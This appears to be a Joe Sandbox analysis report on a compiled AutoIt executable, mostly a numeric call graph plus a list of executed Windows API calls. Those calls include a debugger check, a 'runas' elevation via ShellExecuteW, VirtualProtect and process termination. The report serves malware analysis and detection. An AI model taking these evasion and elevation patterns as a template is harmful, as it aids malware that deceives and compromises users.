ee6b6f 105234->105236 105237 f1e460 105234->105237 105235 ee6b0c 105238 ee7667 59 API calls 105235->105238 105240 ee7667 59 API calls 105236->105240 105239 ee5c6f CloseHandle 105237->105239 105241 ee6b18 105238->105241 105242 f1e46c 105239->105242 105243 ee6b78 105240->105243 105244 ee4750 60 API calls 105241->105244 105245 ee4ddd 136 API calls 105242->105245 105246 ee7667 59 API calls 105243->105246 105248 ee6b26 105244->105248 105249 f1e488 105245->105249 105247 ee6b81 105246->105247 105329 ee459b 105247->105329 105327 ee5850 ReadFile SetFilePointerEx 105248->105327 105252 f1e4b1 105249->105252 105256 f4955b 122 API calls 105249->105256 105393 f3f7a1 89 API calls 4 library calls 105252->105393 105253 ee6b98 105258 ee7b2e 59 API calls 105253->105258 105255 ee6b52 105328 ee5aee SetFilePointerEx SetFilePointerEx 105255->105328 105257 f1e4a4 105256->105257 105261 f1e4cd 105257->105261 105262 f1e4ac 105257->105262 105263 ee6ba9 SetCurrentDirectoryW 105258->105263 105259 f1e4c8 105267 ee6d0c Mailbox 105259->105267 105265 ee4e4a 84 API calls 105261->105265 105264 ee4e4a 84 API calls 105262->105264 105269 ee6bbc Mailbox 105263->105269 105264->105252 105266 f1e4d2 105265->105266 105268 f00db6 Mailbox 59 API calls 105266->105268 105319 ee57d4 105267->105319 105275 f1e506 105268->105275 105271 f00db6 Mailbox 59 API calls 105269->105271 105273 ee6bcf 105271->105273 105272 ee3bbb 105272->103931 105272->103940 105274 ee522e 59 API calls 105273->105274 105276 ee6bda Mailbox __NMSG_WRITE 105274->105276 105394 ee750f 59 API calls 2 library calls 105275->105394 105278 ee6ce7 105276->105278 105289 f1e7d9 105276->105289 105296 f1e7d1 105276->105296 105297 ee7de1 59 API calls 105276->105297 105380 ee586d 67 API calls _wcscpy 105276->105380 105381 ee6f5d GetStringTypeW 105276->105381 105382 ee6ecc 60 API calls __wcsnicmp 105276->105382 105383 ee6faa GetStringTypeW __NMSG_WRITE 105276->105383 105384 f0363d GetStringTypeW _iswctype 105276->105384 105385 ee68dc 165 API calls 3 library calls 105276->105385 105386 ee7213 59 API calls Mailbox 105276->105386 105387 ee5c6f 105278->105387 105279 f1e740 105400 f472df 59 API calls Mailbox 105279->105400 105285 f1e762 105401 f5fbce 59 API calls 2 library calls 105285->105401 105288 f1e76f 105290 f02d55 _free 58 API calls 105288->105290 105404 f3f7a1 89 API calls 4 library calls 105289->105404 105290->105267 105403 f3f5f7 59 API calls 4 library calls 105296->105403 105297->105276 105302 ee7de1 59 API calls 105308 f1e54f Mailbox 105302->105308 105306 f1e792 105402 f3f7a1 89 API calls 4 library calls 105306->105402 105308->105279 105308->105302 105308->105306 105395 f3f73d 59 API calls 2 library calls 105308->105395 105396 f3f65e 61 API calls 2 library calls 105308->105396 105397 f4737f 59 API calls Mailbox 105308->105397 105398 ee750f 59 API calls 2 library calls 105308->105398 105399 ee7213 59 API calls Mailbox 105308->105399 105309 f1e7ab 105310 f02d55 _free 58 API calls 105309->105310 105311 f1e7be 105310->105311 105311->105267 105312->105195 105313->105211 105314->105211 105315->105211 105316->105211 105317->105211 105318->105205 105320 ee5c6f CloseHandle 105319->105320 105321 ee57dc Mailbox 105320->105321 105322 ee5c6f CloseHandle 105321->105322 105323 ee57eb 105322->105323 105323->105272 105324->105225 105325->105227 105326->105235 105327->105255 105328->105234 105330 ee7667 59 API calls 105329->105330 105331 ee45b1 105330->105331 105332 ee7667 59 API calls 105331->105332 105333 ee45b9 105332->105333 105334 ee7667 59 API calls 105333->105334 105335 ee45c1 105334->105335 105336 ee7667 59 API calls 105335->105336 105337 ee45c9 105336->105337 105338 f1d4d2 105337->105338 105339 ee45fd 105337->105339 105340 ee8047 59 API calls 105338->105340 105341 ee784b 59 API calls 105339->105341 105342 f1d4db 105340->105342 105343 ee460b 105341->105343 105344 ee7d8c 59 API calls 105342->105344 105345 ee7d2c 59 API calls 105343->105345 105347 ee4640 105344->105347 105346 ee4615 105345->105346 105346->105347 105348 ee784b 59 API calls 105346->105348 105350 ee465f 105347->105350 105365 ee4680 105347->105365 105367 f1d4fb 105347->105367 105351 ee4636 105348->105351 105354 ee79f2 59 API calls 105350->105354 105353 ee7d2c 59 API calls 105351->105353 105352 f1d5cb 105356 ee7bcc 59 API calls 105352->105356 105353->105347 105357 ee4669 105354->105357 105355 ee4691 105358 ee46a3 105355->105358 105360 ee8047 59 API calls 105355->105360 105375 f1d588 105356->105375 105364 ee784b 59 API calls 105357->105364 105357->105365 105359 ee46b3 105358->105359 105361 ee8047 59 API calls 105358->105361 105363 ee46ba 105359->105363 105366 ee8047 59 API calls 105359->105366 105360->105358 105361->105359 105362 f1d5b4 105362->105352 105370 f1d59f 105362->105370 105368 ee8047 59 API calls 105363->105368 105377 ee46c1 Mailbox 105363->105377 105364->105365 105405 ee784b 105365->105405 105366->105363 105367->105352 105367->105362 105374 f1d532 105367->105374 105368->105377 105369 ee79f2 59 API calls 105369->105375 105373 ee7bcc 59 API calls 105370->105373 105371 f1d590 105372 ee7bcc 59 API calls 105371->105372 105372->105375 105373->105375 105374->105371 105378 f1d57b 105374->105378 105375->105365 105375->105369 105418 ee7924 59 API calls 2 library calls 105375->105418 105377->105253 105379 ee7bcc 59 API calls 105378->105379 105379->105375 105380->105276 105381->105276 105382->105276 105383->105276 105384->105276 105385->105276 105386->105276 105388 ee5c88 105387->105388 105389 ee5c79 105387->105389 105388->105389 105391->105224 105392->105231 105393->105259 105394->105308 105395->105308 105396->105308 105397->105308 105398->105308 105399->105308 105400->105285 105401->105288 105402->105309 105403->105289 105406 ee785a 105405->105406 105407 ee78b7 105405->105407 105406->105407 105409 ee7865 105406->105409 105408 ee7d2c 59 API calls 105407->105408 105415 ee7888 _memmove 105408->105415 105410 f1eb09 105409->105410 105411 ee7880 105409->105411 105412 ee8029 59 API calls 105410->105412 105413 ee7f27 59 API calls 105411->105413 105414 f1eb13 105412->105414 105413->105415 105416 f00db6 Mailbox 59 API calls 105414->105416 105415->105355 105417 f1eb33 105416->105417 105418->105375 105420 ee6ea9 105419->105420 105421 ee6d95 105419->105421 105420->104078 105421->105420 105422 f00db6 Mailbox 59 API calls 105421->105422 105424 ee6dbc 105422->105424 105423 f00db6 Mailbox 59 API calls 105425 ee6e31 105423->105425 105424->105423 105425->105420 105432 ee6240 105425->105432 105457 ee735d 59 API calls Mailbox 105425->105457 105458 f36553 59 API calls Mailbox 105425->105458 105459 ee750f 59 API calls 2 library calls 105425->105459 105430->104081 105431->104083 105460 ee7a16 105432->105460 105434 ee646a 105467 ee750f 59 API calls 2 library calls 105434->105467 105436 ee6484 Mailbox 105436->105425 105439 f1dff6 105470 f3f8aa 91 API calls 4 library calls 105439->105470 105440 ee750f 59 API calls 105450 ee6265 105440->105450 105444 ee7d8c 59 API calls 105444->105450 105445 f1e004 105471 ee750f 59 API calls 2 library calls 105445->105471 105447 f1e01a 105447->105436 105448 ee6799 _memmove 105472 f3f8aa 91 API calls 4 library calls 105448->105472 105449 f1df92 105451 ee8029 59 API calls 105449->105451 105450->105434 105450->105439 105450->105440 105450->105444 105450->105448 105450->105449 105454 ee7e4f 59 API calls 105450->105454 105465 ee5f6c 60 API calls 105450->105465 105466 ee5d41 59 API calls Mailbox 105450->105466 105468 ee5e72 60 API calls 105450->105468 105469 ee7924 59 API calls 2 library calls 105450->105469 105452 f1df9d 105451->105452 105456 f00db6 Mailbox 59 API calls 105452->105456 105455 ee643b CharUpperBuffW 105454->105455 105455->105450 105456->105448 105457->105425 105458->105425 105459->105425 105461 f00db6 Mailbox 59 API calls 105460->105461 105462 ee7a3b 105461->105462 105463 ee8029 59 API calls 105462->105463 105464 ee7a4a 105463->105464 105464->105450 105465->105450 105466->105450 105467->105436 105468->105450 105469->105450 105470->105445 105471->105447 105472->105436 105473->104096 105474->104097 105476 f1d423 105475->105476 105477 ee4196 105475->105477 105476->105477 105478 f1d42c DestroyIcon 105476->105478 105477->104103 105501 f42f94 62 API calls _W_store_winword 105477->105501 105478->105477 105501->104103 105503 eee6d5 105502->105503 105504 f23aa9 105503->105504 105507 eee73f 105503->105507 105516 eee799 105503->105516 105686 ee9ea0 105504->105686 105509 ee7667 59 API calls 105507->105509 105507->105516 105508 ee7667 59 API calls 105508->105516 105512 f02d40 __cinit 67 API calls 105512->105516 105516->105508 105516->105512 105534 eef4ba 105533->105534 105535 eef650 105533->105535 105536 eef4c6 105534->105536 105537 f2441e 105534->105537 105538 ee7de1 59 API calls 105535->105538 105815 eef290 331 API calls 2 library calls 105536->105815 105816 f5bc6b 331 API calls Mailbox 105537->105816 105544 eef58c Mailbox 105538->105544 105553 ee3212 105552->105553 105554 ee31e0 105552->105554 105553->104186 105554->105553 105555 ee3205 IsDialogMessageW 105554->105555 105556 f1cf32 GetClassLongW 105554->105556 105555->105553 105555->105554 105556->105554 105556->105555 105557->104186 105947 ee8180 105558->105947 105560 eefd3d 105638->104115 105640->104186 105641->104123 105642->104123 105643->104123 105644->104186 105645->104186 105646->104186 105648 ee9851 105647->105648 105657 ee984b 105647->105657 105649 ee9899 105648->105649 105650 f1f5d3 __i64tow 105648->105650 105652 ee9857 __itow 105648->105652 105653 f1f4da 105648->105653 105650->105650 105657->104186 105665->104186 105666->104186 105668 f1eda1 105667->105668 105669 ee82f2 105667->105669 105671 f1edb1 105668->105671 105992 f361a4 59 API calls 105668->105992 105670 ee8339 Mailbox 105669->105670 105673 ee85c0 59 API calls 105669->105673 105674 ee831c 105669->105674 105670->104186 105673->105674 105675 ee8322 105674->105675 105676 ee85c0 59 API calls 105674->105676 105675->105670 105676->105675 105678->104172 105679->104172 105680->104172 105681->104172 105682->104172 105683->104172 105684->104172 105948 ee818f 105947->105948 105951 ee81aa 105947->105951 105949 ee7e4f 59 API calls 105948->105949 105951->105560 105992->105671 105994 ee7a5f 105993->105994 105995 ee7a85 _memmove 105993->105995 105994->105995 105996 f00db6 Mailbox 59 API calls 105994->105996 105995->104195 105999->104196 106000 f1fe27 106013 eff944 106000->106013 106002 f1fe3d 106003 f1fe53 106002->106003 106004 f1febe 106002->106004 106022 ee9e5d 60 API calls 106003->106022 106007 eefce0 331 API calls 106004->106007 106006 f1fe92 106008 f1fe9a 106006->106008 106009 f2089c 106006->106009 106012 f1feb2 Mailbox 106007->106012 106023 f4834f 59 API calls Mailbox 106008->106023 106024 f49e4a 89 API calls 4 library calls 106009->106024 106014 eff962 106013->106014 106015 eff950 106013->106015 106016 eff968 106014->106016 106017 eff991 106014->106017 106018 ee9d3c 60 API calls 106015->106018 106019 f00db6 Mailbox 59 API calls 106016->106019 106020 ee9d3c 60 API calls 106017->106020 106021 eff95a 106018->106021 106019->106021 106020->106021 106021->106002 106022->106006 106023->106012 106024->106012 106025 ee1066 106030 eef76f 106025->106030 106027 ee106c 106028 f02d40 __cinit 67 API calls 106027->106028 106029 ee1076 106028->106029 106031 eef790 106030->106031 106063 efff03 106031->106063 106035 eef7d7 106036 ee7667 59 API calls 106035->106036 106037 eef7e1 106036->106037 106038 ee7667 59 API calls 106037->106038 106039 eef7eb 106038->106039 106040 ee7667 59 API calls 106039->106040 106041 eef7f5 106040->106041 106042 ee7667 59 API calls 106041->106042 106043 eef833 106042->106043 106044 ee7667 59 API calls 106043->106044 106045 eef8fe 106044->106045 106073 ef5f87 106045->106073 106049 eef930 106050 ee7667 59 API calls 106049->106050 106051 eef93a 106050->106051 106101 effd9e 106051->106101 106053 eef981 106054 eef991 GetStdHandle 106053->106054 106055 eef9dd 106054->106055 106056 f245ab 106054->106056 106057 eef9e5 OleInitialize 106055->106057 106056->106055 106058 f245b4 106056->106058 106057->106027 106108 f46b38 64 API calls Mailbox 106058->106108 106060 f245bb 106109 f47207 CreateThread 106060->106109 106062 f245c7 CloseHandle 106062->106057 106110 efffdc 106063->106110 106066 efffdc 59 API calls 106067 efff45 106066->106067 106068 ee7667 59 API calls 106067->106068 106069 efff51 106068->106069 106070 ee7bcc 59 API calls 106069->106070 106071 eef796 106070->106071 106072 f00162 6 API calls 106071->106072 106072->106035 106074 ee7667 59 API calls 106073->106074 106075 ef5f97 106074->106075 106076 ee7667 59 API calls 106075->106076 106077 ef5f9f 106076->106077 106117 ef5a9d 106077->106117 106080 ef5a9d 59 API calls 106081 ef5faf 106080->106081 106082 ee7667 59 API calls 106081->106082 106083 ef5fba 106082->106083 106084 f00db6 Mailbox 59 API calls 106083->106084 106085 eef908 106084->106085 106086 ef60f9 106085->106086 106087 ef6107 106086->106087 106088 ee7667 59 API calls 106087->106088 106089 ef6112 106088->106089 106090 ee7667 59 API calls 106089->106090 106091 ef611d 106090->106091 106092 ee7667 59 API calls 106091->106092 106093 ef6128 106092->106093 106094 ee7667 59 API calls 106093->106094 106095 ef6133 106094->106095 106096 ef5a9d 59 API calls 106095->106096 106097 ef613e 106096->106097 106098 f00db6 Mailbox 59 API calls 106097->106098 106099 ef6145 RegisterWindowMessageW 106098->106099 106099->106049 106102 effdae 106101->106102 106103 f3576f 106101->106103 106105 f00db6 Mailbox 59 API calls 106102->106105 106120 f49ae7 60 API calls 106103->106120 106107 effdb6 106105->106107 106106 f3577a 106107->106053 106108->106060 106109->106062 106121 f471ed 65 API calls 106109->106121 106111 ee7667 59 API calls 106110->106111 106112 efffe7 106111->106112 106113 ee7667 59 API calls 106112->106113 106114 efffef 106113->106114 106115 ee7667 59 API calls 106114->106115 106116 efff3b 106115->106116 106116->106066 106118 ee7667 59 API calls 106117->106118 106119 ef5aa5 106118->106119 106119->106080 106120->106106 106122 ee1016 106127 ee4974 106122->106127 106125 f02d40 __cinit 67 API calls 106126 ee1025 106125->106126 106128 f00db6 Mailbox 59 API calls 106127->106128 106129 ee497c 106128->106129 106130 ee101b 106129->106130 106134 ee4936 106129->106134 106130->106125 106135 ee493f 106134->106135 106136 ee4951 106134->106136 106137 f02d40 __cinit 67 API calls 106135->106137 106138 ee49a0 106136->106138 106137->106136 106139 ee7667 59 API calls 106138->106139 106140 ee49b8 GetVersionExW 106139->106140 106141 ee7bcc 59 API calls 106140->106141 106142 ee49fb 106141->106142 106143 ee7d2c 59 API calls 106142->106143 106146 ee4a28 106142->106146 106144 ee4a1c 106143->106144 106145 ee7726 59 API calls 106144->106145 106145->106146 106147 f1d864 106146->106147 106148 ee4a93 GetCurrentProcess IsWow64Process 106146->106148 106149 ee4aac 106148->106149 106150 ee4b2b GetSystemInfo 106149->106150 106151 ee4ac2 106149->106151 106152 ee4af8 106150->106152 106162 ee4b37 106151->106162 106152->106130 106155 ee4b1f GetSystemInfo 106157 ee4ae9 106155->106157 106156 ee4ad4 106158 ee4b37 2 API calls 106156->106158 106157->106152 106160 ee4aef FreeLibrary 106157->106160 106159 ee4adc GetNativeSystemInfo 106158->106159 106159->106157 106160->106152 106163 ee4ad0 106162->106163 106164 ee4b40 LoadLibraryA 106162->106164 106163->106155 106163->106156 106164->106163 106165 ee4b51 GetProcAddress 106164->106165 106165->106163 106166 ee1055 106171 ee2649 106166->106171 106169 f02d40 __cinit 67 API calls 106170 ee1064 106169->106170 106172 ee7667 59 API calls 106171->106172 106173 ee26b7 106172->106173 106178 ee3582 106173->106178 106176 ee2754 106177 ee105a 106176->106177 106181 ee3416 59 API calls 2 library calls 106176->106181 106177->106169 106182 ee35b0 106178->106182 106181->106176 106183 ee35a1 106182->106183 106184 ee35bd 106182->106184 106183->106176 106184->106183 106185 ee35c4 RegOpenKeyExW 106184->106185 106185->106183 106186 ee35de RegQueryValueExW 106185->106186 106187 ee35ff 106186->106187 106188 ee3614 RegCloseKey 106186->106188 106187->106188 106188->106183 106189 1441728 106203 143f378 106189->106203 106191 1441819 106207 1441618 106191->106207 106204 143f3c6 106203->106204 106210 1442868 GetPEB 106204->106210 106206 143fa03 106206->106191 106208 1441621 Sleep 106207->106208 106209 144162f 106208->106209 106211 1442892 106210->106211 106211->106206 106212 ee3633 106213 ee366a 106212->106213 106214 ee3688 106213->106214 106215 ee36e7 106213->106215 106253 ee36e5 106213->106253 106219 ee374b PostQuitMessage 106214->106219 106220 ee3695 106214->106220 106217 ee36ed 106215->106217 106218 f1d0cc 106215->106218 106216 ee36ca DefWindowProcW 106240 ee36d8 106216->106240 106221 ee3715 SetTimer RegisterWindowMessageW 106217->106221 106222 ee36f2 106217->106222 106267 ef1070 10 API calls Mailbox 106218->106267 106219->106240 106224 f1d154 106220->106224 106225 ee36a0 106220->106225 106229 ee373e CreatePopupMenu 106221->106229 106221->106240 106226 ee36f9 KillTimer 106222->106226 106227 f1d06f 106222->106227 106272 f42527 71 API calls _memset 106224->106272 106230 ee36a8 106225->106230 106231 ee3755 106225->106231 106264 ee443a Shell_NotifyIconW _memset 106226->106264 106233 f1d074 106227->106233 106234 f1d0a8 MoveWindow 106227->106234 106228 f1d0f3 106268 ef1093 331 API calls Mailbox 106228->106268 106229->106240 106237 ee36b3 106230->106237 106244 f1d139 106230->106244 106257 ee44a0 106231->106257 106241 f1d097 SetFocus 106233->106241 106242 f1d078 106233->106242 106234->106240 106245 ee36be 106237->106245 106246 f1d124 106237->106246 106238 f1d166 106238->106216 106238->106240 106241->106240 106242->106245 106247 f1d081 106242->106247 106243 ee370c 106265 ee3114 DeleteObject DestroyWindow Mailbox 106243->106265 106244->106216 106271 f37c36 59 API calls Mailbox 106244->106271 106245->106216 106269 ee443a Shell_NotifyIconW _memset 106245->106269 106270 f42d36 81 API calls _memset 106246->106270 106266 ef1070 10 API calls Mailbox 106247->106266 106252 f1d134 106252->106240 106253->106216 106255 f1d118 106256 ee434a 68 API calls 106255->106256 106256->106253 106258 ee4539 106257->106258 106259 ee44b7 _memset 106257->106259 106258->106240 106260 ee407c 61 API calls 106259->106260 106262 ee44de 106260->106262 106261 ee4522 KillTimer SetTimer 106261->106258 106262->106261 106263 f1d4ab Shell_NotifyIconW 106262->106263 106263->106261 106264->106243 106265->106240 106266->106240 106267->106228 106268->106245 106269->106255 106270->106252 106271->106253 106272->106238 106273 f1fdfc 106290 eeab30 Mailbox _memmove 106273->106290 106276 ee9c90 Mailbox 59 API calls 106276->106290 106277 eeb525 106352 f49e4a 89 API calls 4 library calls 106277->106352 106280 f209e5 106357 f49e4a 89 API calls 4 library calls 106280->106357 106281 f20055 106351 f49e4a 89 API calls 4 library calls 106281->106351 106282 eea057 106283 f00db6 59 API calls Mailbox 106297 ee9f37 Mailbox 106283->106297 106286 eeb475 106291 ee8047 59 API calls 106286->106291 106288 f20064 106289 eeb47a 106289->106280 106289->106281 106290->106276 106290->106277 106290->106282 106290->106297 106299 ee7de1 59 API calls 106290->106299 106306 eeb2b6 106290->106306 106308 ee9ea0 331 API calls 106290->106308 106309 f2086a 106290->106309 106311 f20878 106290->106311 106313 f2085c 106290->106313 106314 eeb21c 106290->106314 106316 f00db6 59 API calls Mailbox 106290->106316 106319 f36e8f 59 API calls 106290->106319 106323 f5445a 331 API calls 106290->106323 106324 f5df23 106290->106324 106327 f5df37 106290->106327 106330 f6241e 106290->106330 106346 f5c193 85 API calls 2 library calls 106290->106346 106347 f5c2e0 96 API calls Mailbox 106290->106347 106348 f47956 59 API calls Mailbox 106290->106348 106349 f5bc6b 331 API calls Mailbox 106290->106349 106350 f3617e 59 API calls Mailbox 106290->106350 106291->106282 106295 ee8047 59 API calls 106295->106297 106296 ee7667 59 API calls 106296->106297 106297->106281 106297->106282 106297->106283 106297->106286 106297->106289 106297->106295 106297->106296 106298 f36e8f 59 API calls 106297->106298 106300 f209d6 106297->106300 106302 f02d40 67 API calls __cinit 106297->106302 106303 eea55a 106297->106303 106343 eec8c0 331 API calls 2 library calls 106297->106343 106344 eeb900 60 API calls Mailbox 106297->106344 106298->106297 106299->106290 106356 f49e4a 89 API calls 4 library calls 106300->106356 106302->106297 106355 f49e4a 89 API calls 4 library calls 106303->106355 106345 eef6a3 331 API calls 106306->106345 106308->106290 106310 ee9c90 Mailbox 59 API calls 106309->106310 106310->106313 106354 f49e4a 89 API calls 4 library calls 106311->106354 106313->106282 106353 f3617e 59 API calls Mailbox 106313->106353 106315 ee9d3c 60 API calls 106314->106315 106317 eeb22d 106315->106317 106316->106290 106318 ee9d3c 60 API calls 106317->106318 106318->106306 106319->106290 106323->106290 106358 f5cadd 106324->106358 106326 f5df33 106326->106290 106328 f5cadd 130 API calls 106327->106328 106329 f5df47 106328->106329 106329->106290 106331 ee9837 84 API calls 106330->106331 106332 f62436 106331->106332 106333 ee7667 59 API calls 106332->106333 106334 f62444 106333->106334 106335 ee9b3c 59 API calls 106334->106335 106336 f6244f 106335->106336 106337 f62479 106336->106337 106340 ee9837 84 API calls 106336->106340 106447 ee9a3c 59 API calls Mailbox 106337->106447 106339 f62485 Mailbox 106339->106290 106341 f6246a 106340->106341 106342 ee784b 59 API calls 106341->106342 106342->106337 106343->106297 106344->106297 106345->106277 106346->106290 106347->106290 106348->106290 106349->106290 106350->106290 106351->106288 106352->106313 106353->106282 106354->106313 106355->106282 106356->106280 106357->106282 106359 ee9837 84 API calls 106358->106359 106360 f5cb1a 106359->106360 106385 f5cb61 Mailbox 106360->106385 106396 f5d7a5 106360->106396 106362 f5cf2e 106434 f5d8c8 92 API calls Mailbox 106362->106434 106365 f5cf3d 106366 f5cdc7 106365->106366 106367 f5cf49 106365->106367 106409 f5c96e 106366->106409 106367->106385 106368 ee9837 84 API calls 106383 f5cbb2 Mailbox 106368->106383 106373 f5ce00 106424 f00c08 106373->106424 106376 f5ce33 106379 ee92ce 59 API calls 106376->106379 106377 f5ce1a 106430 f49e4a 89 API calls 4 library calls 106377->106430 106382 f5ce3f 106379->106382 106380 f5ce25 GetCurrentProcess TerminateProcess 106380->106376 106381 f5cdb9 106381->106362 106381->106366 106384 ee9050 59 API calls 106382->106384 106383->106368 106383->106381 106383->106385 106428 f5fbce 59 API calls 2 library calls 106383->106428 106429 f5cfdf 61 API calls 2 library calls 106383->106429 106386 f5ce55 106384->106386 106385->106326 106395 f5ce7c 106386->106395 106431 ee8d40 59 API calls Mailbox 106386->106431 106388 f5cfa4 106388->106385 106391 f5cfb8 FreeLibrary 106388->106391 106389 f5ce6b 106432 f5d649 107 API calls _free 106389->106432 106391->106385 106394 ee9d3c 60 API calls 106394->106395 106395->106388 106395->106394 106433 ee8d40 59 API calls Mailbox 106395->106433 106435 f5d649 107 API calls _free 106395->106435 106397 ee7e4f 59 API calls 106396->106397 106398 f5d7c0 CharLowerBuffW 106397->106398 106436 f3f167 106398->106436 106402 ee7667 59 API calls 106403 f5d7f9 106402->106403 106404 ee784b 59 API calls 106403->106404 106406 f5d810 106404->106406 106405 f5d858 Mailbox 106405->106383 106407 ee7d2c 59 API calls 106406->106407 106408 f5d81c Mailbox 106407->106408 106408->106405 106443 f5cfdf 61 API calls 2 library calls 106408->106443 106410 f5c9de 106409->106410 106411 f5c989 106409->106411 106415 f5da50 106410->106415 106412 f00db6 Mailbox 59 API calls 106411->106412 106414 f5c9ab 106412->106414 106413 f00db6 Mailbox 59 API calls 106413->106414 106414->106410 106414->106413 106416 f5dc79 Mailbox 106415->106416 106423 f5da73 _strcat _wcscpy __NMSG_WRITE 106415->106423 106416->106373 106417 ee9b3c 59 API calls 106417->106423 106418 ee9b98 59 API calls 106418->106423 106419 ee9be6 59 API calls 106419->106423 106420 ee9837 84 API calls 106420->106423 106421 f0571c 58 API calls std::exception::_Copy_str 106421->106423 106423->106416 106423->106417 106423->106418 106423->106419 106423->106420 106423->106421 106446 f45887 61 API calls 2 library calls 106423->106446 106426 f00c1d 106424->106426 106425 f00cb5 VirtualProtect 106427 f00c83 106425->106427 106426->106425 106426->106427 106427->106376 106427->106377 106428->106383 106429->106383 106430->106380 106431->106389 106432->106395 106433->106395 106434->106365 106435->106395 106438 f3f192 __NMSG_WRITE 106436->106438 106437 f3f1d1 106437->106402 106437->106408 106438->106437 106440 f3f1c7 106438->106440 106442 f3f278 106438->106442 106440->106437 106444 ee78c4 61 API calls 106440->106444 106442->106437 106445 ee78c4 61 API calls 106442->106445 106443->106405 106444->106440 106445->106442 106446->106423 106447->106339 106448 f2416f 106452 f35fe6 106448->106452 106450 f2417a 106451 f35fe6 85 API calls 106450->106451 106451->106450 106458 f36020 106452->106458 106460 f35ff3 106452->106460 106453 f36022 106464 ee9328 84 API calls Mailbox 106453->106464 106454 f36027 106456 ee9837 84 API calls 106454->106456 106457 f3602e 106456->106457 106459 ee7b2e 59 API calls 106457->106459 106458->106450 106459->106458 106460->106453 106460->106454 106460->106458 106461 f3601a 106460->106461 106463 ee95a0 59 API calls _wcsstr 106461->106463 106463->106458 106464->106454

                                                                                                                            Executed Functions

                                                                                                                            Function 00EE3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EE3B68
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00EE3B7A
                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00FA52F8,00FA52E0,?,?), ref: 00EE3BEB
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                              • Part of subcall function 00EF092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00EE3C14,00FA52F8,?,?,?), ref: 00EF096E
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00EE3C6F
                                                                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F97770,00000010), ref: 00F1D281
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00FA52F8,?,?,?), ref: 00F1D2B9
                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F94260,00FA52F8,?,?,?), ref: 00F1D33F
                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F1D346
                                                                                                                              • Part of subcall function 00EE3A46: GetSysColorBrush.USER32(0000000F), ref: 00EE3A50
                                                                                                                              • Part of subcall function 00EE3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00EE3A5F
                                                                                                                              • Part of subcall function 00EE3A46: LoadIconW.USER32(00000063), ref: 00EE3A76
                                                                                                                              • Part of subcall function 00EE3A46: LoadIconW.USER32(000000A4), ref: 00EE3A88
                                                                                                                              • Part of subcall function 00EE3A46: LoadIconW.USER32(000000A2), ref: 00EE3A9A
                                                                                                                              • Part of subcall function 00EE3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EE3AC0
                                                                                                                              • Part of subcall function 00EE3A46: RegisterClassExW.USER32(?), ref: 00EE3B16
                                                                                                                              • Part of subcall function 00EE39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EE3A03
                                                                                                                              • Part of subcall function 00EE39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EE3A24
                                                                                                                              • Part of subcall function 00EE39D5: ShowWindow.USER32(00000000,?,?), ref: 00EE3A38
                                                                                                                              • Part of subcall function 00EE39D5: ShowWindow.USER32(00000000,?,?), ref: 00EE3A41
                                                                                                                              • Part of subcall function 00EE434A: _memset.LIBCMT ref: 00EE4370
                                                                                                                              • Part of subcall function 00EE434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE4415
                                                                                                                            Strings
                                                                                                                            • runas, xrefs: 00F1D33A
                                                                                                                            • This is a third-party compiled AutoIt script., xrefs: 00F1D279
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                            • API String ID: 529118366-3287110873
                                                                                                                            • Opcode ID: 686f1b0507784fee4dbaea2da485a2f61c3a9cf7752781a45d67593ea3930987
                                                                                                                            • Instruction ID: f99da03a0210e05690f6f787e6ed7ca27255f63ea51ac6321f3652c9f31bddaa
                                                                                                                            • Opcode Fuzzy Hash: 686f1b0507784fee4dbaea2da485a2f61c3a9cf7752781a45d67593ea3930987
                                                                                                                            • Instruction Fuzzy Hash: 1F5109B1D0828CAEDF01EBF5EC05AEDBBF4AF46B50F105065F461B3162CA708645EB21
                                                                                                                            Function 00EE49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
